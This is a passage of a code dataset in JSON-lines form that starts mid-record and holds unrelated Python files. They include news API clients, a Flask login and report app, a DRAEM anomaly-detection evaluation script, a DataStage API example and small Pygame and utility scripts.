md5\n\n# Single 256-slot array shared by the 7 hash probes below.\nBLOOM_FILTER = np.zeros(2**8)\n\ndef add(elem):\n    for idx in range(7):\n        hsh = md5(f\"{idx}-{elem}\".encode('utf-8')).hexdigest()\n        pos = int(hsh[:2], 16)\n        BLOOM_FILTER[pos] = 1\n\ndef find(elem):\n    presence = []\n    for idx in range(7):\n        hsh = md5(f\"{idx}-{elem}\".encode('utf-8')).hexdigest()\n        pos = int(hsh[:2], 16)\n        presence.append(BLOOM_FILTER[pos])\n\n    return all(presence)","repo_name":"galathinius/real-time-programming","sub_path":"examples/bloom_filter.py","file_name":"bloom_filter.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36559786148","text":"import json\nimport time\nfrom typing import Union\nfrom abc import ABC, abstractmethod\n\nimport requests\n\nimport settings\nimport models\n\n\nclass BaseAPI:\n    \n    @abstractmethod\n    def get_news_list(self, q: Union[str, None] = 'e') -> list:\n        pass\n    \n\n\nclass RedditAPI(BaseAPI):\n\n    URL = 'https://www.reddit.com'\n    source_name = 'reddit'\n\n    def __init__(self) -> None:\n        self.token = None\n        self.token_time = None\n\n    def get_token(self):\n        if self.token is None or (self.token_time is not None\n                                  and time.time() - self.token_time > 3590):\n            response = requests.post(\n                
f'{self.URL}/api/v1/access_token',\n data={\n 'grant_type': 'password',\n 'username': settings.REDDIT_USERNAME,\n 'password': settings.REDDIT_PASSWORD\n },\n headers={\n 'user-agent':\n f'{settings.REDDIT_APP_NAME} by {settings.REDDIT_USERNAME}'\n },\n auth=requests.auth.HTTPBasicAuth(settings.REDDIT_APP_ID,\n settings.REDDIT_APP_SECRET))\n response_json = response.json()\n self.token = response_json['access_token']\n self.token_time = time.time()\n return self.token\n\n def get_news_list(self, q: Union[str, None] = 'e ') -> list:\n url = 'https://oauth.reddit.com/subreddits/search?'\n if q:\n url += f'q={q}'\n response = requests.get(\n url=url,\n params=dict(sort='relevance', limit=25),\n headers={\n 'Authorization':\n f'bearer {self.get_token()}',\n 'User-Agent':\n f'{settings.REDDIT_APP_NAME} by {settings.REDDIT_USERNAME}'\n })\n response_json = response.json()\n news_list = []\n if response_json:\n for element in response_json['data']['children']:\n a = element['data']\n news_list.append(\n models.News(headline=a['title'],\n link=self.URL + a['url'],\n source=self.source_name,\n image_url=a['header_img']))\n return news_list\n\n\nclass NewsAPI(BaseAPI):\n\n URL = 'https://newsapi.org/v2'\n source_name = 'newsapi'\n\n def __init__(self) -> None:\n pass\n\n def get_news_list(self, q: Union[str, None] = 'e') -> list:\n url = f'{self.URL}/everything?'\n if q:\n url += f'q={q}'\n response = requests.get(url=url,\n params=dict(apiKey=settings.NEWS_API_KEY,\n language='en')).json()\n if 'articles' not in response:\n raise Exception(\n 'Unexpected respinse from NewsAPI. \"{}\"'.format(response))\n news_list = []\n for a in response['articles']:\n news_list.append(\n models.News(headline=a['title'],\n link=a['url'],\n source=self.source_name,\n image_url=a['urlToImage']))\n return news_list","repo_name":"Tsegaab/z-new-api","sub_path":"news_source.py","file_name":"news_source.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40081453445","text":"from csv import reader\nimport sys, argparse\nimport pdb\n\ndef main( argv ):\n parser = argparse.ArgumentParser( prog='make_sedfiles.py', \n description=\\\n 'Make a sedfile for each of the CDs/States in the input CSV,' \\\n ' and a make_reports.sh that will call the sedfiles' )\n parser.add_argument( '-c', '--cds_file', required=True,\n help='The CDs to work with' )\n parser.add_argument( '-s', '--states_file', required=True,\n help='The state names' )\n my_args = parser.parse_args()\n\n # pdb.set_trace()\n cds_todo_file = my_args.cds_file\n states_file = my_args.states_file\n\n template_filename = \"NY14_template.Rmd\"\n template_state_cd = \"New York's 14th\" \n template_cd = \"14th\"\n template_st = \"NY\"\n template_data_date = \"102320\"\n data_date = \"102320\"\n bash_name = \"make_reports.sh\"\n \n with open( cds_todo_file, 'r' ) as read_obj:\n csv_reader = reader( read_obj )\n state_cds = list( map( tuple, csv_reader ))\n with open( states_file, 'r' ) as read_obj:\n csv_reader = reader( read_obj )\n state_name_list = list( map( tuple, csv_reader ))\n state_names = {}\n for state_abbr, state_name in state_name_list:\n state_names[ state_abbr ] = state_name\n with open( bash_name, \"w\" ) as bash_obj:\n for state, cd in state_cds:\n target_file = \"New/{}{}_2020.Rmd\".format( state, cd )\n cd = int( cd )\n sed_name = \"SEDs/sedfile_{}{}.txt\".format( state, cd )\n with open( sed_name, \"w\" ) as write_obj:\n suff = \"th\"\n if ( cd == 1 or 
cd == 21 or cd == 31 or cd == 41 or cd == 51 ):\n                    suff = \"st\"\n                elif ( cd == 2 or cd == 22 or cd == 32 or cd == 42 or cd == 52 ):\n                    suff = \"nd\"\n                elif ( cd == 3 or cd == 23 or cd == 33 or cd == 43 or cd == 53 ):\n                    suff = \"rd\"\n                str = \"s/{}/{} {}{}/g\\n\".format( template_state_cd, state_names[state],\n                                               cd, suff )\n                write_obj.write( str )\n                str = \"s/NY 14/{} {}/g\\n\".format( state, cd )\n                write_obj.write( str )\n                str = \"s/_NY-14/_{}-{}/g\\n\".format( state, cd )\n                write_obj.write( str )\n                str = \"s/NY14/{}{}/g\\n\".format( state, cd )\n                write_obj.write( str )\n                str = \"s/_NY-/_{}-/g\\n\".format( state )\n                write_obj.write( str )\n                if ( template_data_date != data_date ):\n                    str = \"s/{}/{}/g\\n\".format( template_data_date, data_date )\n                    write_obj.write( str )\n            str = \"sed -f {} {} > {}\\n\".format( sed_name, template_filename,\n                                                target_file )\n            bash_obj.write( str ) \n\nif __name__ == \"__main__\":\n    main( sys.argv[1:] )\n\n\n","repo_name":"edgi-govdata-archiving/EEW-Report-Making","sub_path":"reportcards/make_sedfiles.py","file_name":"make_sedfiles.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42800790583","text":"import os\nfrom myproject import app,db\nfrom flask import render_template, redirect, request, url_for, flash, abort, send_file\nfrom flask_login import login_user,login_required,logout_user\nfrom myproject.models import User\nfrom myproject.forms import LoginForm, RegistrationForm\nfrom myproject.reporting import create_VAT_Report\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\n@app.route('/')\ndef home():\n    return render_template('home.html')\n\n@app.route('/welcome')\n@login_required\ndef welcome_user():\n    return render_template('welcome_user.html')\n\n@app.route('/reports', methods=['GET', 'POST'])\n@login_required\ndef reports():\n    if request.method == 'POST':\n        sales_report = request.files['file']\n        if sales_report.filename != '':\n            filename = sales_report.filename\n            xls_filename = filename[:-3]+\"xls\"\n            sales_report.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            csv_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n            xls_path = os.path.join(app.config['REPORTS_FOLDER'], xls_filename)\n            create_VAT_Report(csv_path,xls_path)\n            '''\n            Delete from UPLOAD FOLDER\n            Delete from REPORTS FOLDER\n            '''\n            return send_file(f'../reports/{xls_filename}',mimetype='xls',attachment_filename=f'{xls_filename}',as_attachment=True)\n    return render_template('reports.html')\n\n@app.route('/logout')\n@login_required\ndef logout():\n    logout_user()\n    flash('You logged out!')\n    return redirect(url_for('home'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\n    form = LoginForm()\n    if form.validate_on_submit():\n        # Grab the user from our User Models table\n        user = User.query.filter_by(email=form.email.data).first()\n\n        # Check that the user was supplied and the password is right\n        # The verify_password method comes from the User object\n        # https://stackoverflow.com/questions/2209755/python-operation-vs-is-not\n\n        if user is not None and user.check_password(form.password.data):\n            #Log in the user\n\n            login_user(user)\n            flash('Logged in successfully.')\n\n            # If a user was trying to visit a page that requires a login\n            # flask saves that URL as 'next'.\n            next = request.args.get('next')\n\n            # So let's now check if that next exists, otherwise we'll go to\n            # the welcome page.\n            if next is None or not next[0]=='/':\n                next = 
url_for('welcome_user')\n\n return redirect(next)\n return render_template('login.html', form=form)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n\n if form.validate_on_submit():\n user = User(email=form.email.data,\n username=form.username.data,\n password=form.password.data)\n\n db.session.add(user)\n db.session.commit()\n flash('Thanks for registering! Now you can login!')\n return redirect(url_for('login'))\n return render_template('register.html', form=form)\n #return redirect(url_for('login'))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"onmyeoin/WebApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35887692337","text":"from bokeh.charts import Bar, Area\nfrom bokeh.embed import file_html\nfrom bokeh.resources import INLINE\nfrom bokeh.charts.attributes import cat\nfrom positions import portfolio_utils as pu\n\n\ndef get_position_data(positions):\n \"\"\"Fetches metrics for given Position objects to be used for analysis views\"\"\"\n\n # columns to return\n cols = [\"Name\", \"Symbol\", \"Shares\", \"Market Value ($)\", \"Last Price ($)\", \"Day's Change ($)\", \"Day's Change (%)\",\n \"Day's Gain/Loss ($)\", \"Cost Basis ($)\", \"Total Gain/Loss ($)\", \"Overall Return (%)\", \"Account\"]\n\n df = pu.get_positions_dataframe(positions, nthreads=10)\n\n # derived values\n df[\"Market Value ($)\"] = df[\"Shares\"] * df[\"Last Price ($)\"]\n df[\"Day's Gain/Loss ($)\"] = df[\"Shares\"] * df[\"Day's Change ($)\"]\n df[\"Total Gain/Loss ($)\"] = df[\"Market Value ($)\"] - df[\"Cost Basis ($)\"]\n df[\"Overall Return (%)\"] = 100. * df[\"Total Gain/Loss ($)\"] / df[\"Cost Basis ($)\"]\n df[\"Concentration\"] = 100. 
* df[\"Market Value ($)\"] / df[\"Market Value ($)\"].sum()\n\n return df\n\n\ndef get_concentration_bar_chart(df):\n \"\"\"Creates bar chart visualizing portfolio concentration by position\"\"\"\n df = df[[\"Symbol\", \"Concentration\"]].sort_values(\"Concentration\", ascending=False)\n\n chart = Bar(\n df,\n label=cat(columns='Symbol', sort=False),\n values='Concentration',\n title='Portfolio Concentration By Position',\n ylabel='Concentration (%)',\n plot_width=1200,\n plot_height=400,\n legend=False,\n color='#4285f4'\n )\n\n return file_html(chart, INLINE)\n\n\ndef get_concentration_area_chart(df):\n \"\"\"Creates area chart visualizing portfolio concentration by position\"\"\"\n df = (\n df[[\"Symbol\", \"Concentration\"]]\n .sort_values(\"Concentration\")\n .set_index(\"Symbol\")\n .cumsum()\n .reset_index()\n .drop(\"Symbol\", axis=1)\n )\n\n chart = Area(\n df['Concentration'].astype(float),\n title='Cumulative Portfolio Concentration',\n ylabel='% of Total Value',\n xlabel='Number of Positions',\n plot_width=1200,\n plot_height=400,\n legend=False,\n color='#4285f4'\n )\n\n chart.x_range.start, chart.x_range.end = 0, df.shape[0]\n\n return file_html(chart, INLINE)\n","repo_name":"rdcolema/snapshot-finance","sub_path":"analysis/analysis_utils.py","file_name":"analysis_utils.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"12505927194","text":"# palindrome function definition goes here\ndef checkpalindrome(in_str):\n #string = \"\".join(e for e in in_str if e.isalnum())\n #org = \"\".join(e for e in in_str if e.isalnum())\n string = \"\"\n for x in in_str:\n if x.isalnum():\n string += x\n revstring = string[::-1]\n if revstring.lower() == string.lower():\n return True\n return False\nin_str = input(\"Enter a string: \")\n\ncheck = checkpalindrome(in_str)\n# call the function and print out the appropriate message\n\nif check:\n print(f\"\\\"{in_str}\\\" is a palindrome.\")\nelse:\n print(f\"\\\"{in_str}\\\" is not a palindrome.\")\n","repo_name":"Illugi317/forritun","sub_path":"Unsorted/digit.py","file_name":"digit.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2618587534","text":"import torch\nimport torch.nn.functional as F\nfrom data_loader import MVTecDRAEMTestDataset\nfrom torch.utils.data import DataLoader\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score, average_precision_score\nfrom model_unet import ReconstructiveSubNetwork, DiscriminativeSubNetwork\nfrom tensorboard_visualizer import TensorboardVisualizer\nfrom tensorboard_visualizer import TensorboardVisualizer\nimport os\n\n\ndef write_results_to_file(run_name, image_auc, pixel_auc, image_ap, pixel_ap):\n if not os.path.exists('./outputs/'):\n os.makedirs('./outputs/')\n\n fin_str = \"img_auc\"\n for i in image_auc:\n fin_str += \",\" + str(np.round(i, 3))\n fin_str += \",\"+str(np.round(np.mean(image_auc), 3))\n fin_str += \"\\n\"\n fin_str += \"pixel_auc\"\n for i in pixel_auc:\n fin_str += \",\" + str(np.round(i, 3))\n fin_str += \",\"+str(np.round(np.mean(pixel_auc), 3))\n fin_str += \"\\n\"\n fin_str += \"img_ap\"\n for i in image_ap:\n fin_str += \",\" + str(np.round(i, 3))\n fin_str += \",\"+str(np.round(np.mean(image_ap), 3))\n fin_str += \"\\n\"\n fin_str += \"pixel_ap\"\n for i in pixel_ap:\n fin_str += \",\" + str(np.round(i, 3))\n fin_str += \",\"+str(np.round(np.mean(pixel_ap), 
3))\n fin_str += \"\\n\"\n fin_str += run_name\n fin_str += \"\\n\"\n fin_str += \"--------------------------\\n\"\n\n\n with open(\"./outputs/results.txt\",'a+') as file:\n file.write(fin_str)\n\n\ndef test(obj_names, args, epoch, test_dataset=None):\n obj_ap_pixel_list = []\n obj_auroc_pixel_list = []\n obj_ap_image_list = []\n obj_auroc_image_list = []\n for obj_name in obj_names:\n img_dim = 256\n run_name = args.base_model_name + obj_name+'_'\n if args.visualize:\n visualizer = TensorboardVisualizer(log_dir=os.path.join(args.log_path, run_name + \"/\"))\n\n model = ReconstructiveSubNetwork(in_channels=3, out_channels=3)\n old_ckpt = torch.load(os.path.join(args.checkpoint_path, run_name + \".pckl\"), 'cpu')\n new_ckpt = {}\n for k, v in old_ckpt.items():\n new_k = k.replace('module.', '')\n new_ckpt[new_k] = v\n model.load_state_dict(new_ckpt)\n model.cuda()\n model.eval()\n\n model_seg = DiscriminativeSubNetwork(in_channels=6, out_channels=2)\n old_ckpt = torch.load(os.path.join(args.checkpoint_path, run_name + \"_seg.pckl\"), 'cpu')\n new_ckpt = {}\n for k, v in old_ckpt.items():\n new_k = k.replace('module.', '')\n new_ckpt[new_k] = v\n model_seg.load_state_dict(new_ckpt)\n model_seg.cuda()\n model_seg.eval()\n\n\n root_dir = args.data_path\n if args.dataset == 'mvtec':\n root_dir += obj_name\n\n if test_dataset is None:\n test_dataset = MVTecDRAEMTestDataset(args.dataset, root_dir, resize_shape=[img_dim, img_dim])\n\n test_loader = DataLoader(test_dataset, batch_size=1, shuffle=False, num_workers=0)\n\n total_pixel_scores = np.zeros((img_dim * img_dim * len(test_dataset)))\n total_gt_pixel_scores = np.zeros((img_dim * img_dim * len(test_dataset)))\n mask_cnt = 0\n\n anomaly_score_gt = []\n anomaly_score_prediction = []\n\n display_images = torch.zeros((16 ,3 ,256 ,256)).cuda()\n display_gt_images = torch.zeros((16 ,3 ,256 ,256)).cuda()\n display_out_masks = torch.zeros((16 ,1 ,256 ,256)).cuda()\n display_in_masks = torch.zeros((16 ,1 ,256 ,256)).cuda()\n cnt_display = 0\n display_indices = np.random.randint(len(test_loader), size=(16,))\n\n with torch.no_grad():\n for i_batch, sample_batched in enumerate(test_loader):\n\n gray_batch = sample_batched[\"image\"].cuda()\n\n is_normal = sample_batched[\"has_anomaly\"].detach().numpy()[0, 0] #bs=1\n anomaly_score_gt.append(is_normal)\n true_mask = sample_batched[\"mask\"]\n true_mask_cv = true_mask.detach().numpy()[0, :, :, :].transpose((1, 2, 0)) # (256,256,1)\n\n gray_rec = model(gray_batch)\n joined_in = torch.cat((gray_rec.detach(), gray_batch), dim=1)\n\n out_mask = model_seg(joined_in)\n out_mask_sm = torch.softmax(out_mask, dim=1) # (1,2,256,256)\n # 通道0(像素0)代表正常,通道1(像素1)代表异常,softmax 0 1分类后,和gt的one-hot标签对比\n\n out_mask_cv = out_mask_sm[0 ,1 ,: ,:].detach().cpu().numpy() # (256,256)\n # 对mask做了一次平滑\n out_mask_averaged = torch.nn.functional.avg_pool2d(out_mask_sm[: ,1: ,: ,:], 21, stride=1,\n padding=21 // 2).cpu().detach().numpy()\n # print(\"test\")\n # print(\"true_mask_cv:\", true_mask_cv.shape)\n # print(\"out_mask:\", out_mask.size())\n # print(\"out_mask_sm:\", out_mask_sm.size())\n # print(\"out_mask_cv:\", out_mask_cv.shape)\n\n if i_batch in display_indices:\n t_mask = out_mask_sm[:, 1:, :, :]\n display_images[cnt_display] = gray_rec[0]\n display_gt_images[cnt_display] = gray_batch[0]\n display_out_masks[cnt_display] = t_mask[0]\n display_in_masks[cnt_display] = true_mask[0]\n cnt_display += 1\n\n\n image_score = np.max(out_mask_averaged)\n\n anomaly_score_prediction.append(image_score)\n\n flat_true_mask = 
true_mask_cv.flatten()\n                flat_out_mask = out_mask_cv.flatten()\n                total_pixel_scores[mask_cnt * img_dim * img_dim:(mask_cnt + 1) * img_dim * img_dim] = flat_out_mask\n                total_gt_pixel_scores[mask_cnt * img_dim * img_dim:(mask_cnt + 1) * img_dim * img_dim] = flat_true_mask\n                mask_cnt += 1\n\n        if args.visualize:\n            visualizer.visualize_image_batch(display_images, epoch, image_name='test_rec')\n            visualizer.visualize_image_batch(display_gt_images, epoch, image_name='test_img')\n            visualizer.visualize_image_batch(display_out_masks, epoch, image_name='test_out_mask')\n            visualizer.visualize_image_batch(display_in_masks, epoch, image_name='test_gt_mask')\n\n        anomaly_score_prediction = np.array(anomaly_score_prediction)\n        anomaly_score_gt = np.array(anomaly_score_gt)\n        auroc = roc_auc_score(anomaly_score_gt, anomaly_score_prediction)\n        ap = average_precision_score(anomaly_score_gt, anomaly_score_prediction)\n\n        total_gt_pixel_scores = total_gt_pixel_scores.astype(np.uint8)\n        total_gt_pixel_scores = total_gt_pixel_scores[:img_dim * img_dim * mask_cnt]\n        total_pixel_scores = total_pixel_scores[:img_dim * img_dim * mask_cnt]\n        auroc_pixel = roc_auc_score(total_gt_pixel_scores, total_pixel_scores)\n        ap_pixel = average_precision_score(total_gt_pixel_scores, total_pixel_scores)\n        obj_ap_pixel_list.append(ap_pixel)\n        obj_auroc_pixel_list.append(auroc_pixel)\n        obj_auroc_image_list.append(auroc)\n        obj_ap_image_list.append(ap)\n        print(obj_name)\n        print(\"AUC Image:  \" +str(auroc))\n        print(\"AUC Pixel:  \" +str(auroc_pixel))\n        print(\"AP Image:  \" +str(ap))\n        print(\"AP Pixel:  \" +str(ap_pixel))\n        print(\"==============================\")\n\n        # if args.dataset == 'mt' or 'aitex':\n        log_path = \"./outputs/\" + str(args.dataset) + \"/\" + str(obj_name) + \"_result.log\"\n        log = \"AUC Image:  \" + str(auroc) + '\\n' + \"AUC Pixel:  \" + str(auroc_pixel) + '\\n' + \\\n              \"AP Image:  \" + str(ap) + '\\n' + \"AP Pixel:  \" + str(ap_pixel) + '\\n' + \"==============================\" + '\\n' + run_name\n        with open(log_path, 'a+') as file:\n            file.write(log + '\\n')\n    return [auroc, auroc_pixel, ap, ap_pixel]\n\n\n    # print(\"AUC Image mean:  \" + str(np.mean(obj_auroc_image_list)))\n    # print(\"AP Image mean:  \" + str(np.mean(obj_ap_image_list)))\n    # print(\"AUC Pixel mean:  \" + str(np.mean(obj_auroc_pixel_list)))\n    # print(\"AP Pixel mean:  \" + str(np.mean(obj_ap_pixel_list)))\n    # write_results_to_file(run_name, obj_auroc_image_list, obj_auroc_pixel_list, obj_ap_image_list, obj_ap_pixel_list)\n\n\n\n\n\nif __name__==\"__main__\":\n    import argparse\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--gpu_id', action='store', type=int, required=True)\n    parser.add_argument('--base_model_name', action='store', type=str, required=True)\n    parser.add_argument('--data_path', action='store', type=str, required=True)\n    parser.add_argument('--checkpoint_path', action='store', type=str, required=True)\n    parser.add_argument('--dataset', action='store', type=str, required=True)\n    parser.add_argument('--visualize', action='store_true', required=False)\n    parser.add_argument('--log_path', action='store', type=str, required=True)\n    args = parser.parse_args()\n    if args.dataset == 'mvtec':\n        obj_list = ['capsule',\n                     'bottle',\n                     'carpet',\n                     'leather',\n                     'pill',\n                     'transistor',\n                     'tile',\n                     'cable',\n                     'zipper',\n                     'toothbrush',\n                     'metal_nut',\n                     'hazelnut',\n                     'screw',\n                     'grid',\n                     'wood'\n                     ]\n    elif args.dataset == 'mt':\n        obj_list = ['mt']\n    elif args.dataset == 'aitex':\n        obj_list = ['aitex']\n\n\n    with 
torch.cuda.device(args.gpu_id):\n        test(obj_list, args, 0)  # epoch is only used to tag visualizer output\n        # test(obj_list, args.dataset, args.data_path, args.checkpoint_path, args.base_model_name, args.visualize, args.log_path)\n","repo_name":"YanZhenyu1999/SAD","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4783903038","text":"from django.contrib import admin\nfrom import_export import resources, fields\nfrom assocr.models import Member, UF, Association\n\nclass MemberResource(resources.ModelResource): \n    #name = fields.Field(column_name='Nom')\n    #firstsurname = fields.Field(column_name='1r Cogonom')\n    \n    class Meta:\n        model = Member\n        fields = ('uf__association__penyanumber', 'uf__currentaccount', 'uf__typequote', 'id', 'uf', 'name', 'firstsurname','secondsurname','dni',\n                  'birthdaydate', 'typeadress', 'adress', 'number', 'portal', 'ladder', 'floor', 'door','postalcode', 'city', 'province', 'country', 'telephone', 'fcbmember', 'fcbnumber', 'email', )\n        export_order = ('uf__association__penyanumber', 'uf__currentaccount', 'uf__typequote', 'id', 'uf', 'name', 'firstsurname','secondsurname','dni',\n                  'birthdaydate', 'typeadress', 'adress', 'number', 'portal', 'ladder', 'floor', 'door','postalcode', 'city', 'province', 'country', 'telephone', 'fcbmember', 'fcbnumber', 'email', ) \n    \n    def before_import(self, dataset, dry_run): \n        if 'uf' in dataset.headers:\n            for row in dataset.dict:\n                try:\n                    unif = UF.objects.get(id=int(row['uf']))\n                    unif.currentaccount = row['uf__currentaccount']\n                    unif.typequote = row['uf__typequote']\n                    unif.save()\n                except UF.DoesNotExist:\n                    unif = None\n                    unif = UF(id=int(row['uf']))\n                    assoc = Association.objects.get(penyanumber=int(row['uf__association__penyanumber']))\n                    unif.association = assoc\n                    unif.state = 1\n                    unif.currentaccount = row['uf__currentaccount']\n                    unif.typequote = row['uf__typequote']\n                    unif.save()\n\n","repo_name":"erueloi/Assocr","sub_path":"assocr/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"19564761636","text":"# coding: utf-8\nimport os, math\n\npeso = int(raw_input(\"Quantidade de Quilos pescada : \"))\n\nexcedente = 'ZERO'\nmulta = 'ZERO'\n\nif peso > 50:\n    excedente = peso - 50.00\n    multa = excedente * 4.00\n\nprint ('Peso Excedente %s Kg(s)' % str(excedente))\nprint ('Valor da Multa R$ %s ' % str(multa))\n","repo_name":"andersonlemos/PythonForZombies","sub_path":"Task List/exercise5.py","file_name":"exercise5.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"570711995","text":"from config import *\nfrom ibm_datastage_api import DSAPI, convert_char_p_to_list\n\ndsapi = DSAPI()\nhproj = None\nhjob = None\n\ntry:\n    _, err = dsapi.DSLoadLibrary(API_LIB_FILE)\n    if err:\n        raise Exception(\"Loading the library failed: {}\".format(err))\n\n    print(\"Setting the parameters to connect to DataStage server\")\n    dsapi.DSSetServerParams(DS_DOMAIN_NAME, DS_USER_NAME, DS_PASSWORD, DS_SERVER)\n\n    print(\"Loading the project {}\".format(DS_PROJECT))\n    hproj, err = dsapi.DSOpenProject(DS_PROJECT)\n    if err:\n        raise Exception(\"Can't open the project {}: {}\".format(DS_PROJECT, err))\n\n    print(\"Loading the job {}\".format(DS_JOB_NAME))\n    hjob, err = dsapi.DSOpenJob(hproj, DS_JOB_NAME)\n    if err:\n        raise Exception(\"Can't open the job {}: 
{}\".format(DS_JOB_NAME, err))\n\n print(\"Getting an information about the link of the stage\")\n\n DS_JOB_STAGE_NAME = 'TR_TST'\n DS_JOB_STAGE_LINK_NAME = 'LNK_TR'\n\n infoTypes_list = [\n (dsapi.DSJ_LINKLASTERR, 'DSJ_LINKLASTERR'),\n (dsapi.DSJ_LINKNAME, 'DSJ_LINKNAME'),\n (dsapi.DSJ_LINKROWCOUNT, 'DSJ_LINKROWCOUNT'),\n (dsapi.DSJ_LINKSQLSTATE, 'DSJ_LINKSQLSTATE'),\n (dsapi.DSJ_LINKDBMSCODE, 'DSJ_LINKDBMSCODE'),\n (dsapi.DSJ_LINKDESC, 'DSJ_LINKDESC'),\n (dsapi.DSJ_LINKSTAGE, 'DSJ_LINKSTAGE'),\n (dsapi.DSJ_INSTROWCOUNT, 'DSJ_INSTROWCOUNT'),\n (dsapi.DSJ_LINKEXTROWCOUNT, 'DSJ_LINKEXTROWCOUNT')\n ]\n\n for infoType, infoName in infoTypes_list:\n res, err = dsapi.DSGetLinkInfo(hjob, DS_JOB_STAGE_NAME, DS_JOB_STAGE_LINK_NAME, infoType)\n if err:\n print(\"{}. Can't get the link info: {}\".format(infoName, err))\n else:\n if infoName == 'DSJ_LINKLASTERR':\n print(\"{} = {}\".format(infoName, convert_char_p_to_list(res.fullMessage)))\n else:\n print(\"{} = {}\".format(infoName, res))\n\n print(\"Closing the job\")\n dsapi.DSCloseJob(hjob)\n hjob = None\n\n print(\"Closing the project\")\n dsapi.DSCloseProject(hproj)\n hproj = None\n\n dsapi.DSUnloadLibrary()\n\nexcept Exception as e:\n print(\"Runtime error: {}\".format(str(e)))\n\n if hjob:\n print(\"Unblocking the job\")\n dsapi.DSUnlockJob(hjob)\n\n print(\"Closing the job\")\n dsapi.DSCloseJob(hjob)\n hjob = None\n\n if hproj:\n print(\"Closing the project\")\n dsapi.DSCloseProject(hproj)\n hproj = None\n\n dsapi.DSUnloadLibrary()\n\nprint(\"Exit.\")\n","repo_name":"reijnnn/IBM-DataStage-API","sub_path":"Examples/17_get_link_info.py","file_name":"17_get_link_info.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"36838577750","text":"import pygame\nfrom os import path\n\n\ndef create_pictures(img_dir):\n player_img = pygame.image.load(path.join(img_dir, \"Down_0.png\")).convert()\n player_img = pygame.transform.scale(player_img, (35, 43))\n main_menu_pict = pygame.image.load(path.join(img_dir, \"menu1.png\")).convert()\n main_menu_pict = pygame.transform.scale(main_menu_pict, (860, 860))\n death_screen = pygame.image.load(path.join(img_dir, \"death_screen.jfif\")).convert()\n death_screen = pygame.transform.scale(death_screen, (860, 860))\n\n # Создание массивов с анимациями\n skelet_anim_up = ['Up 0.png', 'Up 1.png', 'Up 0.png', 'Up 2.png']\n skelet_anim_down = ['Down 0.png', 'Down 1.png', 'Down 0.png', 'Down 2.png']\n skelet_anim_left = ['Left 0.png', 'Left 1.png', 'Left 0.png', 'Left 2.png']\n skelet_anim_right = ['Right 0.png', 'Right 1.png', 'Right 0.png', 'Right 2.png']\n\n player_anim_up = ['Up_0.png', 'Up_1.png', 'Up_0.png', 'Up_2.png']\n player_anim_down = ['Down_0.png', 'Down_1.png', 'Down_0.png', 'Down_2.png']\n player_anim_left = ['Left_0.png', 'Left_1.png', 'Left_0.png', 'Left_2.png']\n player_anim_right = ['Right_0.png', 'Right_1.png', 'Right_0.png', 'Right_2.png']\n\n player_udar_up = pygame.image.load(path.join(img_dir, \"Udar_Up.png\")).convert()\n player_udar_down = pygame.image.load(path.join(img_dir, \"Udar_Down.png\")).convert()\n player_udar_left = pygame.image.load(path.join(img_dir, \"Udar_Left.png\")).convert()\n player_udar_right = pygame.image.load(path.join(img_dir, \"Udar_Right.png\")).convert()\n player_udar_up = pygame.transform.scale(player_udar_up, (30, 75))\n player_udar_down = pygame.transform.scale(player_udar_down, (30, 75))\n player_udar_left = pygame.transform.scale(player_udar_left, (75, 46))\n 
player_udar_right = pygame.transform.scale(player_udar_right, (75, 46))\n    return (\n        player_img, main_menu_pict, skelet_anim_up, skelet_anim_down, skelet_anim_left, skelet_anim_right,\n        player_anim_up,\n        player_anim_down, player_anim_left, player_anim_right, player_udar_up, player_udar_down, player_udar_left,\n        player_udar_right, death_screen)\n","repo_name":"DronShock/Semester_Project","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4949819547","text":"# Create PyGame screen and set title\n\nimport pygame\n\n# initialize the game\npygame.init()\n\n# Create the screen\nscreen = pygame.display.set_mode((800,600))\n\n# Set title\npygame.display.set_caption('Hangman')\n\n# Game loop\nrunning = True\nwhile running:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n","repo_name":"SunManGH/PyGame02-Hangman","sub_path":"game0.1.py","file_name":"game0.1.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
